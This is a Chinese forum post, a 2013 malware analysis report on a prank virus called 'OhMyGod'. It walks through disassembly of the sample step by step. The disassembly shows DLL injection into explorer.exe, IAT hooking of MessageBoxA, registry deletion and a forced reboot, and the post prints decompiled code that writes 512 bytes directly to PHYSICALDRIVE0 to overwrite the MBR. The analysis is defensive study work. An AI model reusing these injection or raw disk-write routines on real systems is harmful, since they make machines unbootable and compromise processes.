本帖最后由 JoyChou 于 2013-7-14 18:21 编辑
基本信息: 报告名称:OhMyGod 病毒分析
作者:JoyChou
样本类型:MBR感染
样本文件大小: 268 KB (274,432 字节)
样本MD5: 3AE53CB468E2DF56A3E424E934BF30CF
壳信息:无壳
简介
该样本是一个修改MBR的玩笑病毒。
被感染的系统症状
感染该样本后,重启电脑,电脑将无法正常启动,只会显示一串字符串。
文件系统变化
修改MBR,释放rand().txt以及rand().dll
注册表变化
删除HKEY_CURRENT_USER子键Keyboard Layout\Preload,删除输入法
网络症状 无
来到OEP,看到几个关键call,每个都详细分析下
004017A0 /$ E8 FBFEFFFF call OhMyGod.004016A0
004017A5 |. E8 76FDFFFF call OhMyGod.00401520
004017AA |. E8 A1F8FFFF call OhMyGod.00401050
004017AF |. E8 5CFDFFFF call OhMyGod.00401510
004017B4 |. E8 C7F8FFFF call OhMyGod.00401080
004017B9 |. E8 92F9FFFF call OhMyGod.00401150
004017BE |. E8 0DFFFFFF call OhMyGod.004016D0
004017C3 |. E8 58F8FFFF call OhMyGod.00401020
004017C8 |. 6A 00 push 0x0 ; /Style = MB_OK|MB_APPLMODAL
004017CA |. 68 1C914000 push OhMyGod.0040911C ; |111
004017CF |. 68 14914000 push OhMyGod.00409114 ; |Good
004017D4 |. 6A 00 push 0x0 ; |hOwner = NULL
004017D6 |. FF15 5C814000 call dword ptr ds:[<&USER32.MessageBoxA>>; \MessageBoxA
004017DC |. E8 EFFAFFFF call OhMyGod.004012D0
004017E1 |. 6A 00 push 0x0
004017E3 |. 6A 02 push 0x2
004017E5 |. E8 B6FCFFFF call OhMyGod.004014A0
004017EA |. 83C4 08 add esp,0x8
004017ED \. C3 retn
004017A0 /$ E8 FBFEFFFF call OhMyGod.004016A0 这个call 进入
004016A0 |$ 6A 00 push 0x0 ; /pThreadId = NULL
004016A2 |. 6A 00 push 0x0 ; |CreationFlags = 0
004016A4 |. 6A 00 push 0x0 ; |pThreadParm = NULL
004016A6 |. 68 60154000 push OhMyGod.00401560 ; |创建一个线程,来到线程函数
004016AB |. 6A 00 push 0x0 ; |StackSize = 0
004016AD |. 6A 00 push 0x0 ; |pSecurity = NULL
004016AF |. FF15 74804000 call dword ptr ds:[<&KERNEL32.CreateThre>; \CreateThread
004016B5 |. 50 push eax ; /hObject
004016B6 |. FF15 B0804000 call dword ptr ds:[<&KERNEL32.CloseHandl>; \CloseHandle
004016BC \.^ E9 CFFFFFFF jmp OhMyGod.00401690
我们来到线程函数
00401560 . 83EC 0C sub esp,0xC
00401563 . 53 push ebx
00401564 . 55 push ebp
00401565 . 56 push esi
00401566 . 57 push edi
00401567 . E8 E4FAFFFF call OhMyGod.00401050 ; //删除注册表信息(这个call就没有进去了,很简单的)
0040156C . 33DB xor ebx,ebx
0040156E . 68 3F000F00 push 0xF003F
00401573 . 53 push ebx
00401574 . 53 push ebx
00401575 . FF15 04804000 call dword ptr ds:[<&ADVAPI32.OpenSCMana>; 打开服务管理器,SCM是服务管理器的意思
0040157B . 8BE8 mov ebp,eax
0040157D . 3BEB cmp ebp,ebx
0040157F . 75 0C jnz XOhMyGod.0040158D
00401581 . 5F pop edi
00401582 . 5E pop esi
00401583 . 5D pop ebp
00401584 . 33C0 xor eax,eax
00401586 . 5B pop ebx
00401587 . 83C4 0C add esp,0xC
0040158A . C2 0400 retn 0x4
0040158D > 8D4424 14 lea eax,dword ptr ss:[esp+0x14]
00401591 . 8B3D 08804000 mov edi,dword ptr ds:[<&ADVAPI32.EnumSer>; advapi32.EnumServicesStatusA
00401597 . 53 push ebx ; /pResumeHandle
00401598 . 8D4C24 14 lea ecx,dword ptr ss:[esp+0x14] ; |
0040159C . 50 push eax ; |pCount
0040159D . 51 push ecx ; |pBytesNeeded
0040159E . 53 push ebx ; |BufSize
0040159F . 53 push ebx ; |pEnumStatus
004015A0 . 6A 03 push 0x3 ; |ServiceState = 3
004015A2 . 6A 3B push 0x3B ; |ServiceType = SERVICE_KERNEL_DRIVER|SERVICE_FILE_SYSTEM_DRIVER|SERVICE_RECOGNIZER_DRIVER|SERVICE_WIN32_OWN_PROCESS|SERVICE_WIN32_SHARE_PROCESS
004015A4 . 55 push ebp ; |hManager
004015A5 . 895C24 34 mov dword ptr ss:[esp+0x34],ebx ; |
004015A9 . 895C24 30 mov dword ptr ss:[esp+0x30],ebx ; |
004015AD . FFD7 call edi ; \枚举服务
004015AF . 8B5424 10 mov edx,dword ptr ss:[esp+0x10]
004015B3 . 52 push edx ; /Size
004015B4 . 6A 40 push 0x40 ; |Flags = LPTR
004015B6 . FF15 70804000 call dword ptr ds:[<&KERNEL32.LocalAlloc>; \LocalAlloc ;分配内存
004015BC . 8BF0 mov esi,eax
004015BE . 3BF3 cmp esi,ebx
004015C0 . 75 13 jnz XOhMyGod.004015D5
004015C2 . 55 push ebp
004015C3 . FF15 0C804000 call dword ptr ds:[<&ADVAPI32.CloseServi>; 关闭服务
004015C9 . 5F pop edi
004015CA . 5E pop esi
004015CB . 5D pop ebp
004015CC . 33C0 xor eax,eax
004015CE . 5B pop ebx
004015CF . 83C4 0C add esp,0xC
004015D2 . C2 0400 retn 0x4
下面来看第二个call
004017A5 |. E8 76FDFFFF call OhMyGod.00401520
我们进入
00401520 /$ 68 E0904000 push OhMyGod.004090E0 ; /jinguizi
00401525 |. 6A 00 push 0x0 ; |InitialOwner = FALSE
00401527 |. 6A 00 push 0x0 ; |pSecurity = NULL
00401529 |. FF15 68804000 call dword ptr ds:[<&KERNEL32.CreateMute>; \创建一个名为JinGuiZi的互斥对象,功能只能运行一次当前程序,不能双开
0040152F |. 85C0 test eax,eax
00401531 |. 74 26 je XOhMyGod.00401559
00401533 |. FF15 C0804000 call dword ptr ds:[<&KERNEL32.GetLastErr>; [GetLastError
00401539 |. 3D B7000000 cmp eax,0xB7
0040153E |. 75 19 jnz XOhMyGod.00401559
00401540 |. 6A 00 push 0x0 ; /Style = MB_OK|MB_APPLMODAL
00401542 |. 6A 00 push 0x0 ; |Title = NULL
00401544 |. 68 CC904000 push OhMyGod.004090CC ; |只能有一个程序运行
00401549 |. 6A 00 push 0x0 ; |hOwner = NULL
0040154B |. FF15 5C814000 call dword ptr ds:[<&USER32.MessageBoxA>>; \MessageBoxA
00401551 |. 6A 00 push 0x0 ; /ExitCode = 0
00401553 |. FF15 60804000 call dword ptr ds:[<&KERNEL32.ExitProces>; \ExitProcess
00401559 \> C3 retn
下面我们进入004017AA |. E8 A1F8FFFF call OhMyGod.00401050第三个call
还是打开注册表,删除子键
00401050 /$ 51 push ecx ; 删除HKEY_CURRENT_USER子键Keyboard Layout\Preload
00401051 |. 8D4424 00 lea eax,dword ptr ss:[esp]
00401055 |. 50 push eax ; /pHandle
00401056 |. 6A 08 push 0x8 ; |Access = KEY_ENUMERATE_SUB_KEYS
00401058 |. 6A 00 push 0x0 ; |Reserved = 0
0040105A |. 68 44904000 push OhMyGod.00409044 ; |Keyboard Layout\Preload
0040105F |. 68 01000080 push 0x80000001 ; |hKey = HKEY_CURRENT_USER
00401064 |. FF15 1C804000 call dword ptr ds:[<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
0040106A |. 68 44904000 push OhMyGod.00409044 ; /Keyboard Layout\Preload
0040106F |. 68 01000080 push 0x80000001 ; |hKey = HKEY_CURRENT_USER
00401074 |. FF15 20804000 call dword ptr ds:[<&ADVAPI32.RegDeleteK>; \RegDeleteKeyA
0040107A |. 59 pop ecx
0040107B \. C3 retn
下面看004017AF |. E8 5CFDFFFF call OhMyGod.00401510第四个call
00401510 /$ 6A 00 push 0x0 ; /Enable = FALSE
00401512 |. FF15 60814000 call dword ptr ds:[<&USER32.GetForegroun>; |[GetForegroundWindow
00401518 |. 50 push eax ; |hWnd
00401519 |. FF15 50814000 call dword ptr ds:[<&USER32.EnableWindow>; \EnableWindow
0040151F \. C3 retn
再看004017B4 |. E8 C7F8FFFF call OhMyGod.00401080第五个call
00401080 /$ 81EC 04010000 sub esp,0x104
00401086 |. 8D4424 04 lea eax,dword ptr ss:[esp+0x4]
0040108A |. 68 00050000 push 0x500 ; /BufSize = 500 (1280.)
0040108F |. 50 push eax ; |Buffer
00401090 |. FF15 B4804000 call dword ptr ds:[<&KERNEL32.GetWindows>; \GetWindowsDirectoryA
00401096 |. 85C0 test eax,eax
00401098 |. 75 14 jnz XOhMyGod.004010AE
0040109A |. 68 78904000 push OhMyGod.00409078
0040109F |. E8 62080000 call OhMyGod.00401906
004010A4 |. 83C4 04 add esp,0x4
004010A7 |. 81C4 04010000 add esp,0x104
004010AD |. C3 retn
004010AE |> 56 push esi
004010AF |. 6A 00 push 0x0
004010B1 |. E8 74070000 call OhMyGod.0040182A
004010B6 |. 50 push eax
004010B7 |. E8 46070000 call OhMyGod.00401802
004010BC |. E8 4B070000 call OhMyGod.0040180C ; 获取一个随机数,然后以这个随机数命名新建的txt,YY用
004010C1 |. 8D4C24 10 lea ecx,dword ptr ss:[esp+0x10]
004010C5 |. 68 0C184000 push OhMyGod.0040180C ; /<%ld> = 40180C (4200460.)
004010CA |. 51 push ecx ; |<%s>
004010CB |. 8D9424 980000>lea edx,dword ptr ss:[esp+0x98] ; |
004010D2 |. 68 6C904000 push OhMyGod.0040906C ; |Format = "%s\%ld.txt"
004010D7 |. 52 push edx ; |s
004010D8 |. FF15 58814000 call dword ptr ds:[<&USER32.wsprintfA>] ; \wsprintfA
004010DE |. 83C4 18 add esp,0x18
004010E1 |. 8D8424 880000>lea eax,dword ptr ss:[esp+0x88] ; 在windows目录下创建rand().txt文件
004010E8 |. 6A 00 push 0x0 ; /hTemplateFile = NULL
004010EA |. 68 80000000 push 0x80 ; |Attributes = NORMAL
004010EF |. 6A 02 push 0x2 ; |Mode = CREATE_ALWAYS
004010F1 |. 6A 00 push 0x0 ; |pSecurity = NULL
004010F3 |. 6A 02 push 0x2 ; |ShareMode = FILE_SHARE_WRITE
004010F5 |. 68 00000010 push 0x10000000 ; |Access = GENERIC_ALL
004010FA |. 50 push eax ; |FileName
004010FB |. FF15 B8804000 call dword ptr ds:[<&KERNEL32.CreateFile>; \CreateFileA
00401101 |. 8D4C24 04 lea ecx,dword ptr ss:[esp+0x4] ; 写入“金龟子真棒”
00401105 |. 6A 00 push 0x0 ; /pOverlapped = NULL
00401107 |. 51 push ecx ; |pBytesWritten
00401108 |. 8BF0 mov esi,eax ; |
0040110A |. 6A 0E push 0xE ; |nBytesToWrite = E (14.)
0040110C |. 68 5C904000 push OhMyGod.0040905C ; |Buffer = OhMyGod.0040905C
00401111 |. 56 push esi ; |hFile
00401112 |. FF15 BC804000 call dword ptr ds:[<&KERNEL32.WriteFile>>; \WriteFile
00401118 |. 56 push esi ; /hObject
00401119 |. FF15 B0804000 call dword ptr ds:[<&KERNEL32.CloseHandl>; \CloseHandle
0040111F |. E8 2CFFFFFF call OhMyGod.00401050
00401124 |. 5E pop esi
00401125 |. 81C4 04010000 add esp,0x104
0040112B \. C3 retn
我们进去这个004010B1 |. E8 74070000 call OhMyGod.0040182A看下
获取随机数
再看第六个call之前,我们看下母本的输入表
输入表
接着,继续
00401150 /$ 83EC 24 sub esp,0x24
00401153 |. 53 push ebx
00401154 |. 56 push esi
00401155 |. 57 push edi ; 获取当前进程
00401156 |. 6A 00 push 0x0 ; /pModule = NULL
00401158 |. FF15 64804000 call dword ptr ds:[<&KERNEL32.GetModuleHandleA>] ; \GetModuleHandleA
0040115E |. 8BF8 mov edi,eax
00401160 |. 8B47 3C mov eax,dword ptr ds:[edi+0x3C] ; 获取PE头
00401163 |. 8BB438 800000>mov esi,dword ptr ds:[eax+edi+0x80] ; 获取输入表
0040116A |. 8B443E 10 mov eax,dword ptr ds:[esi+edi+0x10] ; 获取IAT
0040116E |. 03F7 add esi,edi
00401170 |. 85C0 test eax,eax
00401172 |. 74 21 je XOhMyGod.00401195
00401174 |. 8B1D 9C804000 mov ebx,dword ptr ds:[<&KERNEL32.lstrcmpiA>] ; 将lstrcmpiA函数地址给ebx
0040117A |> 8B46 0C /mov eax,dword ptr ds:[esi+0xC] ; 获取输入表名字
0040117D |. 68 8C904000 |push OhMyGod.0040908C ; ASCII "USER32.DLL"
00401182 |. 03C7 |add eax,edi
00401184 |. 50 |push eax
00401185 |. FFD3 |call ebx
00401187 |. 85C0 |test eax,eax ; 判断是否为user32.dll
00401189 |. 74 0A |je XOhMyGod.00401195
0040118B |. 8B46 24 |mov eax,dword ptr ds:[esi+0x24]
0040118E |. 83C6 14 |add esi,0x14 ; 加上一整个输入表的大小0x14
00401191 |. 85C0 |test eax,eax
00401193 |.^ 75 E5 \jnz XOhMyGod.0040117A
00401195 |> 8B76 10 mov esi,dword ptr ds:[esi+0x10] ; 将user32.dll的IAT给esi
00401198 |. 85F6 test esi,esi
0040119A |. 74 6C je XOhMyGod.00401208
0040119C |. 8B043E mov eax,dword ptr ds:[esi+edi]
0040119F |. 03F7 add esi,edi
004011A1 |. 85C0 test eax,eax
004011A3 |. 74 63 je XOhMyGod.00401208
004011A5 |. 8B1D A0804000 mov ebx,dword ptr ds:[<&KERNEL32.VirtualQuery>] ; kernel32.VirtualQuery
004011AB |. 8B3D A4804000 mov edi,dword ptr ds:[<&KERNEL32.VirtualProtect>] ; kernel32.VirtualProtect
004011B1 |. 55 push ebp
004011B2 |. 8B2D A8804000 mov ebp,dword ptr ds:[<&KERNEL32.WriteProcessMemory>] ; kernel32.WriteProcessMemory
004011B8 |> 3B05 E8BA4000 /cmp eax,dword ptr ds:[0x40BAE8] ; user32.MessageBoxA
004011BE |. 75 3D |jnz XOhMyGod.004011FD
004011C0 |. 8D4C24 18 |lea ecx,dword ptr ss:[esp+0x18]
004011C4 |. 6A 1C |push 0x1C
004011C6 |. 51 |push ecx
004011C7 |. 56 |push esi
004011C8 |. FFD3 |call ebx ; // VirtualQuery
004011CA |. 8D5424 14 |lea edx,dword ptr ss:[esp+0x14]
004011CE |. 52 |push edx
004011CF |. 6A 04 |push 0x4
004011D1 |. 6A 04 |push 0x4
004011D3 |. 56 |push esi
004011D4 |. FFD7 |call edi ; // VirtualProtect
004011D6 |. 6A 00 |push 0x0
004011D8 |. 8D4424 14 |lea eax,dword ptr ss:[esp+0x14]
004011DC |. 6A 04 |push 0x4 ; 4个字节大小
004011DE |. 50 |push eax ; 将MessageBoxA函数地址入栈
004011DF |. 56 |push esi
004011E0 |. C74424 20 301>|mov dword ptr ss:[esp+0x20],OhMyGod.00401130
004011E8 |. FF15 AC804000 |call dword ptr ds:[<&KERNEL32.GetCurrentProcess>] ; GetCurrentProcess
004011EE |. 50 |push eax
004011EF |. FFD5 |call ebp ; // WriteProcessMemory
004011F1 |. 8B4C24 14 |mov ecx,dword ptr ss:[esp+0x14] ; 将MessageBoxA函数地址写入到esi
004011F5 |. 6A 00 |push 0x0
004011F7 |. 51 |push ecx
004011F8 |. 6A 04 |push 0x4
004011FA |. 56 |push esi
004011FB |. FFD7 |call edi ; // VirtualProtect
004011FD |> 8B46 04 |mov eax,dword ptr ds:[esi+0x4] ; 找到MessageBoxA函数地址,在弹出goodjob的时候就利用这个地址
00401200 |. 83C6 04 |add esi,0x4
00401203 |. 85C0 |test eax,eax
00401205 |.^ 75 B1 \jnz XOhMyGod.004011B8
00401207 |. 5D pop ebp
00401208 |> 5F pop edi
00401209 |. 5E pop esi
0040120A |. 5B pop ebx
0040120B |. 83C4 24 add esp,0x24
0040120E \. C3 retn
下面看第七个call 004017BE |. E8 0DFFFFFF call OhMyGod.004016D0
进去
过程是,先获取当前程序的文件名,打开文件,获取文件大小,申请一块文件大小的空间,
再把文件内容全部读入到申请的buffer,最后写入到新创建的GuiZi.exe,完成自我复制的功能。
004016D0 /$ 81EC 84000000 sub esp,0x84 ; 作者本意是复制自己文件到系统目录下的GuiZi.exe,可是,没成功
没成功的原因是:CreateFile API第二个参数应该是GENERIC_READ,因为要读取
004016D6 |. 53 push ebx ; 不过为什么不直接用CopyFile呢
004016D7 |. 56 push esi
004016D8 |. 57 push edi
004016D9 |. B9 1F000000 mov ecx,0x1F
004016DE |. 33C0 xor eax,eax
004016E0 |. 8D7C24 11 lea edi,dword ptr ss:[esp+0x11]
004016E4 |. C64424 10 00 mov byte ptr ss:[esp+0x10],0x0
004016E9 |. 68 80000000 push 0x80 ; /BufSize = 80 (128.)
004016EE |. F3:AB rep stos dword ptr es:[edi] ; |
004016F0 |. 66:AB stos word ptr es:[edi] ; |
004016F2 |. AA stos byte ptr es:[edi] ; |
004016F3 |. 8D4424 14 lea eax,dword ptr ss:[esp+0x14] ; |
004016F7 |. 50 push eax ; |PathBuffer
004016F8 |. 6A 00 push 0x0 ; |hModule = NULL
004016FA |. FF15 80804000 call dword ptr ds:[<&KERNEL32.GetModuleFileNameA>>; \GetModuleFileNameA
00401700 |. 8B1D B8804000 mov ebx,dword ptr ds:[<&KERNEL32.CreateFileA>] ; kernel32.CreateFileA
00401706 |. 6A 00 push 0x0 ; /hTemplateFile = NULL
00401708 |. 68 80000000 push 0x80 ; |Attributes = NORMAL
0040170D |. 6A 03 push 0x3 ; |Mode = OPEN_EXISTING
0040170F |. 6A 00 push 0x0 ; |pSecurity = NULL
00401711 |. 6A 03 push 0x3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
00401713 |. 8D4C24 24 lea ecx,dword ptr ss:[esp+0x24] ; |
00401717 |. 68 00000010 push 0x10000000 ; |Access = GENERIC_ALL
0040171C |. 51 push ecx ; |FileName
0040171D |. FFD3 call ebx ; \CreateFileA
0040171F |. 8D5424 0C lea edx,dword ptr ss:[esp+0xC]
00401723 |. 8BF0 mov esi,eax
00401725 |. 52 push edx ; /pFileSizeHigh
00401726 |. 56 push esi ; |hFile
00401727 |. FF15 7C804000 call dword ptr ds:[<&KERNEL32.GetFileSize>] ; \GetFileSize
0040172D |. 8B4424 0C mov eax,dword ptr ss:[esp+0xC]
00401731 |. 6A 04 push 0x4 ; /flProtect = 4
00401733 |. 68 00100000 push 0x1000 ; |flAllocationType = 1000 (4096.)
00401738 |. 50 push eax ; |dwSize
00401739 |. 6A 00 push 0x0 ; |lpAddress = NULL
0040173B |. 6A 00 push 0x0 ; |hProcess = NULL
0040173D |. FF15 48804000 call dword ptr ds:[<&KERNEL32.VirtualAllocEx>] ; \VirtualAllocEx
00401743 |. 8B5424 0C mov edx,dword ptr ss:[esp+0xC]
00401747 |. 8D4C24 0C lea ecx,dword ptr ss:[esp+0xC]
0040174B |. 6A 00 push 0x0 ; /pOverlapped = NULL
0040174D |. 8BF8 mov edi,eax ; |
0040174F |. 51 push ecx ; |pBytesRead
00401750 |. 52 push edx ; |BytesToRead
00401751 |. 57 push edi ; |Buffer
00401752 |. 56 push esi ; |hFile
00401753 |. FF15 78804000 call dword ptr ds:[<&KERNEL32.ReadFile>] ; \ReadFile
00401759 |. 6A 00 push 0x0 ; /hTemplateFile = NULL
0040175B |. 68 80000000 push 0x80 ; |Attributes = NORMAL
00401760 |. 6A 02 push 0x2 ; |Mode = CREATE_ALWAYS
00401762 |. 6A 00 push 0x0 ; |pSecurity = NULL
00401764 |. 6A 03 push 0x3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
00401766 |. 68 00000010 push 0x10000000 ; |Access = GENERIC_ALL
0040176B |. 68 F4904000 push OhMyGod.004090F4 ; |FileName = "C:\WINDOWS\SYSTEM32\GuiZi.exe"
00401770 |. FFD3 call ebx ; \CreateFileA
00401772 |. 8B4C24 0C mov ecx,dword ptr ss:[esp+0xC]
00401776 |. 8BD8 mov ebx,eax
00401778 |. 8D4424 0C lea eax,dword ptr ss:[esp+0xC]
0040177C |. 6A 00 push 0x0 ; /pOverlapped = NULL
0040177E |. 50 push eax ; |pBytesWritten
0040177F |. 51 push ecx ; |nBytesToWrite
00401780 |. 57 push edi ; |Buffer
00401781 |. 53 push ebx ; |hFile
00401782 |. FF15 BC804000 call dword ptr ds:[<&KERNEL32.WriteFile>] ; \WriteFile
00401788 |. 8B3D B0804000 mov edi,dword ptr ds:[<&KERNEL32.CloseHandle>] ; kernel32.CloseHandle
0040178E |. 53 push ebx ; /hObject
0040178F |. FFD7 call edi ; \CloseHandle
00401791 |. 56 push esi ; /hObject
00401792 |. FFD7 call edi ; \CloseHandle
00401794 |. 5F pop edi
00401795 |. 5E pop esi
00401796 |. 5B pop ebx ; 7FFDE000
00401797 |. 81C4 84000000 add esp,0x84
0040179D \. C3 retn
再看第八个call 004017C3 |. E8 58F8FFFF call OhMyGod.00401020
完成对ASCII "Shabisafhlfiakhfdka"解密, “Shbeo}p{剱摖9孟 荏?K”,目测是个干扰,没用的地方
第9个call就弹一个提示框,我们跳过
再看第十个call 004017DC |. E8 EFFAFFFF call OhMyGod.004012D0 这个call
功能:创建一个rand().dll,并LoadLibraryA(rand().dll),注入到桌面进程,方便系统中招。
004012D0 /$ 81EC 28010000 sub esp,0x128
004012D6 |. 53 push ebx
004012D7 |. 55 push ebp
004012D8 |. 56 push esi
004012D9 |. 57 push edi
004012DA |. 33FF xor edi,edi
004012DC |. C74424 10 280>mov dword ptr ss:[esp+0x10],0x128
004012E4 |. 57 push edi ; /ProcessID => 0
004012E5 |. 6A 02 push 0x2 ; |Flags = TH32CS_SNAPPROCESS
004012E7 |. E8 10050000 call <jmp.&KERNEL32.CreateToolhelp32Snap>; \CreateToolhelp32Snapshot
004012EC |. 8BE8 mov ebp,eax
004012EE |. 8D4424 10 lea eax,dword ptr ss:[esp+0x10]
004012F2 |. 50 push eax ; /lppe
004012F3 |. 55 push ebp ; |hSnapshot
004012F4 |. E8 FD040000 call <jmp.&KERNEL32.Process32First> ; \Process32First
004012F9 |. 85C0 test eax,eax
004012FB |. 74 4F je XOhMyGod.0040134C
004012FD |> BE A8904000 /mov esi,OhMyGod.004090A8 ; ASCII "explorer.exe"
00401302 |. 8D4424 34 |lea eax,dword ptr ss:[esp+0x34]
00401306 |> 8A10 |/mov dl,byte ptr ds:[eax]
00401308 |. 8A1E ||mov bl,byte ptr ds:[esi]
0040130A |. 8ACA ||mov cl,dl
0040130C |. 3AD3 ||cmp dl,bl
0040130E |. 75 1E ||jnz XOhMyGod.0040132E
00401310 |. 84C9 ||test cl,cl
00401312 |. 74 16 ||je XOhMyGod.0040132A
00401314 |. 8A50 01 ||mov dl,byte ptr ds:[eax+0x1]
00401317 |. 8A5E 01 ||mov bl,byte ptr ds:[esi+0x1]
0040131A |. 8ACA ||mov cl,dl
0040131C |. 3AD3 ||cmp dl,bl
0040131E |. 75 0E ||jnz XOhMyGod.0040132E
00401320 |. 83C0 02 ||add eax,0x2
00401323 |. 83C6 02 ||add esi,0x2
00401326 |. 84C9 ||test cl,cl
00401328 |.^ 75 DC |\jnz XOhMyGod.00401306
0040132A |> 33C0 |xor eax,eax
0040132C |. EB 05 |jmp XOhMyGod.00401333
0040132E |> 1BC0 |sbb eax,eax
00401330 |. 83D8 FF |sbb eax,-0x1
00401333 |> 85C0 |test eax,eax
00401335 |. 74 11 |je XOhMyGod.00401348
00401337 |. 8D4424 10 |lea eax,dword ptr ss:[esp+0x10]
0040133B |. 50 |push eax ; /lppe
0040133C |. 55 |push ebp ; |hSnapshot
0040133D |. E8 AE040000 |call <jmp.&KERNEL32.Process32Next> ; \Process32Next
00401342 |. 85C0 |test eax,eax
00401344 |.^ 75 B7 \jnz XOhMyGod.004012FD
00401346 |. EB 04 jmp XOhMyGod.0040134C
00401348 |> 8B7C24 18 mov edi,dword ptr ss:[esp+0x18]
0040134C |> 57 push edi ; /ProcessId
0040134D |. 6A 00 push 0x0 ; |Inheritable = FALSE
0040134F |. 68 FF0F1F00 push 0x1F0FFF ; |Access = PROCESS_ALL_ACCESS
00401354 |. FF15 4C804000 call dword ptr ds:[<&KERNEL32.OpenProces>; \OpenProcess
0040135A |. 8BF0 mov esi,eax
0040135C |. E8 AFFEFFFF call OhMyGod.00401210 ; 在系统目录创建一个rand().dll,写入MBR使用
00401361 |. 8BD8 mov ebx,eax
00401363 |. 83C9 FF or ecx,0xFFFFFFFF
00401366 |. 8BFB mov edi,ebx
00401368 |. 33C0 xor eax,eax
0040136A |. F2:AE repne scas byte ptr es:[edi]
0040136C |. F7D1 not ecx
0040136E |. 6A 04 push 0x4 ; /flProtect = 4
00401370 |. 49 dec ecx ; |
00401371 |. 68 00100000 push 0x1000 ; |flAllocationType = 1000 (4096.)
00401376 |. 51 push ecx ; |dwSize
00401377 |. 50 push eax ; |lpAddress => NULL
00401378 |. 56 push esi ; |hProcess
00401379 |. FF15 48804000 call dword ptr ds:[<&KERNEL32.VirtualAll>; \VirtualAllocEx
0040137F |. 8BE8 mov ebp,eax
00401381 |. 8BFB mov edi,ebx
00401383 |. 83C9 FF or ecx,0xFFFFFFFF
00401386 |. 33C0 xor eax,eax
00401388 |. F2:AE repne scas byte ptr es:[edi]
0040138A |. F7D1 not ecx
0040138C |. 49 dec ecx
0040138D |. 6A 00 push 0x0 ; /pBytesWritten = NULL
0040138F |. 51 push ecx ; |BytesToWrite
00401390 |. 53 push ebx ; |Buffer
00401391 |. 55 push ebp ; |Address
00401392 |. 56 push esi ; |hProcess
00401393 |. FF15 A8804000 call dword ptr ds:[<&KERNEL32.WriteProce>; \WriteProcessMemory
00401399 |. 8B0D 44804000 mov ecx,dword ptr ds:[<&KERNEL32.LoadLib>; kernel32.LoadLibraryA
0040139F |. 6A 00 push 0x0 ; /lpThreadId = NULL
004013A1 |. 6A 00 push 0x0 ; |dwCreationFlags = 0
004013A3 |. 55 push ebp ; |lpParameter
004013A4 |. 51 push ecx ; |lpStartAddress => kernel32.LoadLibraryA
004013A5 |. 6A 00 push 0x0 ; |dwStackSize = 0
004013A7 |. 6A 00 push 0x0 ; |lpThreadAttributes
004013A9 |. 56 push esi ; |hProcess
004013AA |. FF15 40804000 call dword ptr ds:[<&KERNEL32.CreateRemo>; \CreateRemoteThread
004013B0 |. 8BF8 mov edi,eax
004013B2 |. 6A FF push -0x1 ; /Timeout = INFINITE
004013B4 |. 57 push edi ; |hObject
004013B5 |. FF15 3C804000 call dword ptr ds:[<&KERNEL32.WaitForSin>; \WaitForSingleObject
004013BB |. 68 00800000 push 0x8000 ; /dwFreeType = 8000 (32768.)
004013C0 |. 6A 00 push 0x0 ; |dwSize = 0
004013C2 |. 55 push ebp ; |lpAddress
004013C3 |. 56 push esi ; |hProcess
004013C4 |. FF15 38804000 call dword ptr ds:[<&KERNEL32.VirtualFre>; \VirtualFreeEx
004013CA |. 56 push esi ; /hObject
004013CB |. 8B35 B0804000 mov esi,dword ptr ds:[<&KERNEL32.CloseHa>; |kernel32.CloseHandle
004013D1 |. FFD6 call esi ; \CloseHandle
004013D3 |. 57 push edi ; /hObject
004013D4 |. FFD6 call esi ; \CloseHandle
004013D6 |. 5F pop edi
004013D7 |. 5E pop esi
004013D8 |. 5D pop ebp
004013D9 |. 5B pop ebx
004013DA |. 81C4 28010000 add esp,0x128
004013E0 \. C3 retn
看最后一个call 004017E5 |. E8 B6FCFFFF call OhMyGod.004014A0
获取系统版本,然后重启,当然MBR被恶意修改了,就不能进入系统了
004014A0 /$ 8B4424 04 mov eax,dword ptr ss:[esp+0x4]
004014A4 |. 81EC 94000000 sub esp,0x94
004014AA |. 85C0 test eax,eax
004014AC |. 74 13 je XOhMyGod.004014C1
004014AE |. 83F8 02 cmp eax,0x2
004014B1 |. 74 0E je XOhMyGod.004014C1
004014B3 |. 83F8 01 cmp eax,0x1
004014B6 |. 74 09 je XOhMyGod.004014C1
004014B8 |. 33C0 xor eax,eax
004014BA |. 81C4 94000000 add esp,0x94
004014C0 |. C3 retn
004014C1 |> 57 push edi
004014C2 |. B9 24000000 mov ecx,0x24
004014C7 |. 33C0 xor eax,eax
004014C9 |. 8D7C24 08 lea edi,dword ptr ss:[esp+0x8]
004014CD |. F3:AB rep stos dword ptr es:[edi]
004014CF |. 8D4424 04 lea eax,dword ptr ss:[esp+0x4]
004014D3 |. C74424 04 940>mov dword ptr ss:[esp+0x4],0x94
004014DB |. 50 push eax ; /pVersionInformation
004014DC |. FF15 5C804000 call dword ptr ds:[<&KERNEL32.GetVersion>; \GetVersionExA
004014E2 |. 85C0 test eax,eax
004014E4 |. 5F pop edi
004014E5 |. 75 07 jnz XOhMyGod.004014EE
004014E7 |. 81C4 94000000 add esp,0x94
004014ED |. C3 retn
004014EE |> 837C24 10 02 cmp dword ptr ss:[esp+0x10],0x2
004014F3 |. 75 05 jnz XOhMyGod.004014FA
004014F5 |. E8 F6FEFFFF call OhMyGod.004013F0
004014FA |> 6A 00 push 0x0 ; /Reserved = 0
004014FC |. 6A 06 push 0x6 ; |Options = EWX_REBOOT|EWX_FORCE
004014FE |. FF15 54814000 call dword ptr ds:[<&USER32.ExitWindowsE>; \ExitWindowsEx
00401504 |. 81C4 94000000 add esp,0x94
0040150A \. C3 retn
再看MBR之前,我们看下那个dll,用IDA静态看下
发现只有DllMain一个函数,内容是这个样子
strcpy((char *)FileName, "\\\\.\\PHYSICALDRIVE0");
CreateFileA(FileName, 0xC0000000u, 0, 0, 3u, 0x80u, 0);
WriteFile(hObject, &Buffer, 0x200u, &NumberOfBytesWritten, 0);
此时我们再用winhex导出MBR,IDA静态分析下,详细的MBR学习请转到willJ大大的MBR学习帖哦
;org 7C00h
seg000:7C00 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
seg000:7C00 B8 12 00 mov ax, 12h ; 设置显示器模式,12H:640×480 16色
seg000:7C03 CD 10 int 10h ; - VIDEO - SET VIDEO MODE
seg000:7C03 ; AL = mode
seg000:7C05 BD 18 7C mov bp, 7C18h ; es:bp字符串的地址
seg000:7C08 B9 13 00 mov cx, 13h ; 显示字符串长度为0x13
